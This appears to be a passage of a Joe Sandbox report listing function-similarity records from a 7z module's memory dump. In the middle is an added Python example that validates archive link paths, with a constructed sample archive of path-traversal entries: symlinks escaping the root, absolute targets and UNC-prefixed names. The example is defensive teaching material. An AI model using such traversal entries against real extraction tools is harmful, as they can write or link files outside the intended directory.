                              • Instruction Fuzzy Hash: 78214927B41A0817EF1E8A39A811BE917809F98B84F495038AD0ED3BC8E9B8CD47C300
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 05d75bd9e6c7a1b6fb157d21d0ebc0644388d6d38c98960a44e8038350d5c7f1
                              • Instruction ID: a1d200357ffbb5846ee61c0b5910d5c999a4746cf6d8f58547e11c2aceb8309a
                              • Opcode Fuzzy Hash: 05d75bd9e6c7a1b6fb157d21d0ebc0644388d6d38c98960a44e8038350d5c7f1
                              • Instruction Fuzzy Hash: 872126B3E106604BC7068E3DE788BEAB392F7047FEF064B26DF55639D8D218A454D250
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3590c6d0bcf59f41b6e76912e67f45de8633cf2801e00cea3d94b070f5cd6fe1
                              • Instruction ID: 6f1345dde3f8972bbcdc1bcec83e3625def35a2d57d2794b52bdc5ab9a17af05
                              • Opcode Fuzzy Hash: 3590c6d0bcf59f41b6e76912e67f45de8633cf2801e00cea3d94b070f5cd6fe1
                              • Instruction Fuzzy Hash: E42135F3A304608AC306CF39EB89BB663A1FB187FDF4687258F52579C8D6189444E700
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2716c4ae18f5ff5d555640cd6024ddbdb25aea7ac000581464c462b0bdaade77
                              • Instruction ID: 6bb008cabd4ff35594abe3f0f973675e9fe118e9ce1bc83eee498c225c489b31
                              • Opcode Fuzzy Hash: 2716c4ae18f5ff5d555640cd6024ddbdb25aea7ac000581464c462b0bdaade77
                              • Instruction Fuzzy Hash: 65D01275BA900383EB8C313C290376911C14398325FA88A9DEC1EC6751D15DCEF29408
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ErrorLast
                              • String ID:
                              • API String ID: 408039514-0
                              • Opcode ID: 606528062de862ecd2e5ad603e6f1674b931153cadb5dc82d0d34aaa2013ffa8
                              • Instruction ID: 50c379e291718705907c79f6c0d87cc65179c0629ff06fe365ae7d352d66924e
                              • Opcode Fuzzy Hash: 606528062de862ecd2e5ad603e6f1674b931153cadb5dc82d0d34aaa2013ffa8
                              • Instruction Fuzzy Hash: 4A02F82225968981DFE0FB35EC5176FB320F7C1780F405017EA8E97A29DE6DC852EB52
                              Strings
                              • Cannot create hard link, xrefs: 00F88451
                              • Dangerous link path was ignored, xrefs: 00F88377
                              • Dangerous symbolic link path was ignored, xrefs: 00F884D6
                              • Cannot create symbolic link, xrefs: 00F88660
                              • Incorrect path, xrefs: 00F883D4
                              • Internal error for symbolic link file, xrefs: 00F885A8
                              • Cannot fill link data, xrefs: 00F8852A
                              • Empty link, xrefs: 00F88406
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID: Cannot create hard link$Cannot create symbolic link$Cannot fill link data$Dangerous link path was ignored$Dangerous symbolic link path was ignored$Empty link$Incorrect path$Internal error for symbolic link file
                              • API String ID: 1294909896-553938736
                              • Opcode ID: af50df62797d8402ac558955d229e3593c8d56c8c66c2bf677da475acf059cb7
                              • Instruction ID: 58c4f08dcc913d31aa8b73aeaa963d3abd6c1a7c53950bbd965dee5a7f81327f
                              • Opcode Fuzzy Hash: af50df62797d8402ac558955d229e3593c8d56c8c66c2bf677da475acf059cb7
                              • Instruction Fuzzy Hash: 37B1842225868591CB90FF31EC516AE7720F7C5B90F849023FB8E97629DE3DC856E741
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove$ExceptionThrow
                              • String ID: incorrect update switch command$pqrxyzw
                              • API String ID: 3957182552-3922825594
                              • Opcode ID: 41b23f4014f6085aaf6cdefc9d6df0997c1b3c2b5bdd1975e5dc9d171f647215
                              • Instruction ID: aa7f93e5d2c3c313226575c6565f12440c65d2c898aed16c8cbe4396b7560bff
                              • Opcode Fuzzy Hash: 41b23f4014f6085aaf6cdefc9d6df0997c1b3c2b5bdd1975e5dc9d171f647215
                              • Instruction Fuzzy Hash: 7181C533214A8692CBA0FF15D8517AE7324F7C5B84F808123EA8E4BA64DF3CC946E751
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove$ExceptionThrow$malloc
                              • String ID:
                              • API String ID: 3260709843-0
                              • Opcode ID: 50072fc7dc4e71bb0901f73cb9092738f880ee15fc145bdba844f487ca264e0b
                              • Instruction ID: 49877f7c74207a086ca4dff9d016213043730465db7e609ecf3c60d6de925e59
                              • Opcode Fuzzy Hash: 50072fc7dc4e71bb0901f73cb9092738f880ee15fc145bdba844f487ca264e0b
                              • Instruction Fuzzy Hash: 7DE1F433A0868186DF60EE15E8402ADB760F3C6BE0F594126EF9D1B715DE3DC846E782
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID:
                              • String ID: \$\\?\$\\?\UNC\
                              • API String ID: 0-1962706685
                              • Opcode ID: 267a6c0012ce0b90dfc5c23c265d19d6db197da694bdbae4b4e6e3e236625512
                              • Instruction ID: e16e3c222f94928ebc37cd6df679bf4b14a4be05770b65efd028328babc78266
                              • Opcode Fuzzy Hash: 267a6c0012ce0b90dfc5c23c265d19d6db197da694bdbae4b4e6e3e236625512
                              • Instruction Fuzzy Hash: E1C1AF2260864590CF60EB21D85176E7B21EBC37D4F84D013EA4E8766ADF6DC68AF713
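                               The diagnostic strings of the link-handling function above (Empty link, Incorrect path, Dangerous link path was ignored, Dangerous symbolic link path was ignored, Cannot create hard link / symbolic link, with xrefs at 00F88377 through 00F88660) and the \$\\?\$\\?\UNC\ path prefixes of the function just listed are the vocabulary of archive link-path validation: before an extractor creates anything on disk it must refuse link entries whose target, or whose own location, leaves the extraction root. The Python that follows is an added example written for this page; it is not code from this report nor from the 7z module the dump belongs to, and its rules, its verdict labels (which only echo the categories of the strings above) and the constructed sample archive are assumptions. It demonstrates the one check a text-only normpath() cannot perform: following symlinks that earlier entries of the same archive have already been allowed to create.

```python
"""Link-path validation for archive extraction (added example, not 7-Zip's code).
Entries are checked textually, in archive order, before anything touches disk.
Symlinks accepted earlier are followed when later paths are resolved."""
import posixpath
from dataclasses import dataclass


@dataclass(frozen=True)
class Entry:
    name: str            # archive-relative path of the entry
    kind: str = "file"   # "file", "symlink" or "hardlink"
    target: str = ""     # link target exactly as stored in the archive


class EscapesRoot(Exception):
    """A path would be created, or would point, outside the extraction root."""


def norm(path: str) -> str:
    # Archives built on Windows carry backslashes; treat both separators alike.
    return path.replace("\\", "/")


def naive_normpath(path: str) -> str:
    # What a text-only check sees; kept only to contrast with resolve().
    return posixpath.normpath(norm(path))


def is_absolute(path: str) -> bool:
    p = norm(path)
    # "/x", "//server/share", "//?/C:/x", "//?/UNC/server/share" and "C:/x"
    # all name a location that does not depend on the extraction root.
    return p.startswith("/") or (len(p) >= 2 and p[0].isalpha() and p[1] == ":")


def resolve(path: str, links: dict, depth: int = 0) -> str:
    """Return `path` root-relative with '.'/'..' collapsed and every accepted
    symlink in `links` followed; raise EscapesRoot if it leaves the root.
    `links` maps a resolved link location to its raw, link-relative target."""
    if depth > 40:
        raise EscapesRoot("symlink chain too deep: " + path)
    parts = [p for p in norm(path).split("/") if p not in ("", ".")]
    cur = []
    for i, part in enumerate(parts):
        if part == "..":
            if not cur:
                raise EscapesRoot(path)
            cur.pop()
            continue
        cur.append(part)
        key = "/".join(cur)
        if key in links:
            # Replace the matched prefix by the link target (relative to the
            # link's own directory) and resolve the rewritten path again.
            base = "/".join(cur[:-1])
            return resolve(posixpath.join(base, links[key], *parts[i + 1:]), links, depth + 1)
    return "/".join(cur)


def plan_extraction(entries):
    """Simulate extraction in archive order; return (name, verdict, resolved
    root-relative location or None) per entry. Hard-link targets are taken to
    be root-relative archive paths (an assumption of this example)."""
    links, plan = {}, []
    for e in entries:
        name = norm(e.name).rstrip("/")
        if not name or is_absolute(name) or posixpath.basename(name) in (".", ".."):
            plan.append((e.name, "incorrect path", None))
            continue
        try:
            parent = resolve(posixpath.dirname(name), links)
            real = posixpath.join(parent, posixpath.basename(name))
            if e.kind == "symlink":
                target = norm(e.target)
                if not target:
                    plan.append((e.name, "empty link", None))
                    continue
                if is_absolute(target):
                    raise EscapesRoot(target)
                resolve(posixpath.join(parent, target), links)  # where the link points
                links[real] = target
            elif e.kind == "hardlink":
                if not e.target:
                    plan.append((e.name, "empty link", None))
                    continue
                resolve(e.target, links)
            plan.append((e.name, "ok", real))
        except EscapesRoot:
            verdict = "incorrect path" if e.kind == "file" else "dangerous link path"
            plan.append((e.name, verdict, None))
    return plan


# Constructed sample archive (not taken from the analysed sample); order matters.
SAMPLE_ARCHIVE = [
    Entry("docs/readme.txt"),
    Entry("d/b", "symlink", ".."),            # d/b -> root: harmless on its own
    Entry("d/b/x.txt"),                        # lands at <root>/x.txt through the link
    Entry("a", "symlink", "d/b/.."),           # normpath says "d"; it really is <root>/..
    Entry("etc", "symlink", "/etc"),           # absolute target
    Entry("up", "symlink", "../../outside"),   # textual traversal
    Entry("empty", "symlink", ""),
    Entry("C:/Windows/x.dll"),                 # absolute entry name
    Entry("\\\\?\\UNC\\srv\\share\\f"),         # \\?\UNC\ prefixed entry name
    Entry("docs/copy.txt", "hardlink", "docs/readme.txt"),
]

if __name__ == "__main__":
    for name, verdict, real in plan_extraction(SAMPLE_ARCHIVE):
        print(f"{verdict:20s} {name!r:34s} -> {real}")
```

                               The entry "a" is the instructive one: posixpath.normpath("d/b/..") yields "d", which looks harmless, but because "d/b" was already accepted as a symlink to the root, the real target is the parent of the extraction directory, and only a resolver that follows earlier links sees that. Rejecting absolute and \\?\-prefixed names at the very first check is what keeps the long-path prefixes from ever reaching a CreateFile-style call as a literal path.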
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$wcscmp$ExceptionThrowmemmove
                              • String ID: Empty file path
                              • API String ID: 3919112945-1562447899
                              • Opcode ID: 4cfa43fdf7aadb241ea66799b74f1c086add33526c741a8ff133164f6a191e78
                              • Instruction ID: cd054929539324735f9b1cb555904fed7708dfd20e297f837e9732d32d1ca964
                              • Opcode Fuzzy Hash: 4cfa43fdf7aadb241ea66799b74f1c086add33526c741a8ff133164f6a191e78
                              • Instruction Fuzzy Hash: 2AD1E336604A8586CB20DF15E84036EBB61F784B94F44C127EE8E5BB19DF3DC955EB02
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: f1ac6982316865ef78115947ac071b5bc853db16aa935c33ea20d6eeb25a1a84
                              • Instruction ID: 120fa4846e89935f3bf1cf6e3f2cc89fc8e171e69fa1c6993861dcd4c0d48c13
                              • Opcode Fuzzy Hash: f1ac6982316865ef78115947ac071b5bc853db16aa935c33ea20d6eeb25a1a84
                              • Instruction Fuzzy Hash: 84515F27A10B8985C7A1FE31D95266D3321FB95FE8F5C813AEE1D1F719DE29C8129320
                              APIs
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F71E9F
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F71EC3
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: ErrorLast
                              • String ID:
                              • API String ID: 1452528299-0
                              • Opcode ID: 22be68ce6d10f8936171442d49f81555044f1582d9851aba0b7553b2ee80a743
                              • Instruction ID: b27fef9011ba4e58850be17774d05b4b50fca25156190e7031e020af6c5c992c
                              • Opcode Fuzzy Hash: 22be68ce6d10f8936171442d49f81555044f1582d9851aba0b7553b2ee80a743
                              • Instruction Fuzzy Hash: 48A1F52360868581CBB0EF25E84026EB721F7D57A0F94C113EBCE47A59DF6DC946EB12
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ErrorLastmemmove
                              • String ID:
                              • API String ID: 3561842085-0
                              • Opcode ID: c7de1312469f12b58a544419150d20ceaeec8a7107733208b76bd11ca0581b8d
                              • Instruction ID: 7529391ea61792ef74ee605fc5e1180dfeb2757ed6beea88975705c23d7934b8
                              • Opcode Fuzzy Hash: c7de1312469f12b58a544419150d20ceaeec8a7107733208b76bd11ca0581b8d
                              • Instruction Fuzzy Hash: 9071C422604A8591DFA0EB25EC4179EB720E7C17E0F445123EF9D4BB69DF2DC846DB42
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID: \\?\
                              • API String ID: 1294909896-4282027825
                              • Opcode ID: acd9ec8d22e027280a474f9c43cee375eb4e5258065a7589dca74085d4ab26d4
                              • Instruction ID: 9b46c536aa0ca7de96e7120282a0cd0741a44f382d5fb967cbfea9cc7196f16d
                              • Opcode Fuzzy Hash: acd9ec8d22e027280a474f9c43cee375eb4e5258065a7589dca74085d4ab26d4
                              • Instruction Fuzzy Hash: 1DC19C32205B4592CB54EF25E8907AD7760FBC5B94F444122EB8E8BBA4DF3DC856E701
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs$free$fputc
                              • String ID: Error:$ file$Everything is Ok$Scan WARNINGS for files and folders:$Scan WARNINGS: $WARNING: Cannot open $WARNINGS for files:
                              • API String ID: 2662072562-1527772849
                              • Opcode ID: 92ac762957fcb0b0e0c66e992c5dcbb18189989fa4a3062d3011af6b5088c3dd
                              • Instruction ID: 2d2fd7c68d7f7d4d041a0ddde488ebd887469270c0f5f264808f147b5c27ff1f
                              • Opcode Fuzzy Hash: 92ac762957fcb0b0e0c66e992c5dcbb18189989fa4a3062d3011af6b5088c3dd
                              • Instruction Fuzzy Hash: E551B43260864282CA74FB25EB9577E7322F784BE4F40812BEE4E43A55DF2CC585E702
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 6324547189e8b2bcaad28c273deeb380217af71a168f8b56e1851644d94c6114
                              • Instruction ID: f147d6fdd2476aad3df75da1b096865e7da0791bffc15ad4b3bd1f1cbb2851fa
                              • Opcode Fuzzy Hash: 6324547189e8b2bcaad28c273deeb380217af71a168f8b56e1851644d94c6114
                              • Instruction Fuzzy Hash: 22513926706B8885CB95EF32C8956AD7320FB82FA5F5C4136DE1E1F718CF69C8059321
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ClearVariant
                              • String ID: 2$?$?$Z
                              • API String ID: 1677346816-1743634682
                              • Opcode ID: a78526e38cb49b708f68608ae898e3687e87b602a16de861b12778e0e2767a4b
                              • Instruction ID: 76c55f833525a7e4539b5f6ac5f93d3887c2b0890a838a74475957acba14898e
                              • Opcode Fuzzy Hash: a78526e38cb49b708f68608ae898e3687e87b602a16de861b12778e0e2767a4b
                              • Instruction Fuzzy Hash: 6CD1D63361458492CA70EB26D8906EE7721F7C5794F418223E68E87B79EF2DC945EF02
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 7b9701e2983c76c0a1a72bf315f80d4a189fe68506923e36d5f0ecddaa314cc9
                              • Instruction ID: 373295dd4714d12b1b902d1799b36c5aa5609abd1cb6f51db81460613ea90576
                              • Opcode Fuzzy Hash: 7b9701e2983c76c0a1a72bf315f80d4a189fe68506923e36d5f0ecddaa314cc9
                              • Instruction Fuzzy Hash: 8631FE22611A4A81CB91FF36CD522AC7320EBC5F94F4881379E1D5F356CE29CC52A361
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$CountCurrentErrorLastTick$CreateDirectoryProcessThread
                              • String ID: .tmp$d
                              • API String ID: 503816515-2797371523
                              • Opcode ID: 8d85b33d1c4212d765841e3d2838b488823a18ecd111e72283a08dac768acac0
                              • Instruction ID: 82180a5b6ab57db0c59d385ddc4dea5708d2ff32c00f51812929c75a03b7c7ff
                              • Opcode Fuzzy Hash: 8d85b33d1c4212d765841e3d2838b488823a18ecd111e72283a08dac768acac0
                              • Instruction Fuzzy Hash: E541252321860181DA70BB26E84076E7771B785BE4F448223EE9E47B60CE3CC582E703
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove
                              • String ID:
                              • API String ID: 1534225298-0
                              • Opcode ID: 764178e90417daa3f42c49e3cbf3510b889c5f101c1e8c7e16ca167c2b5fa648
                              • Instruction ID: 4d5ff8694240a0a250cf9d9085bf7299a11e2f9293fdac679f1193783c3c37ca
                              • Opcode Fuzzy Hash: 764178e90417daa3f42c49e3cbf3510b889c5f101c1e8c7e16ca167c2b5fa648
                              • Instruction Fuzzy Hash: FB51CD22714B8582EB60FB11E99129D7710EBD5BE0F485123EF8D1BB19CF2CC956D712
                              APIs
                              Strings
                              • Incorrect volume size:, xrefs: 00F8503C
                              • zero size last volume is not allowed, xrefs: 00F85062
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove$ExceptionThrow
                              • String ID: Incorrect volume size:$zero size last volume is not allowed
                              • API String ID: 3957182552-998621408
                              • Opcode ID: ca37d54a7fa88057a717ca580f3b84c90e82dc324110684d6e4634f1a47e3e16
                              • Instruction ID: 16c5245827a70891f0b431c938e770fd7a7f69e4ce95d68a5af4f85e77f3a3a4
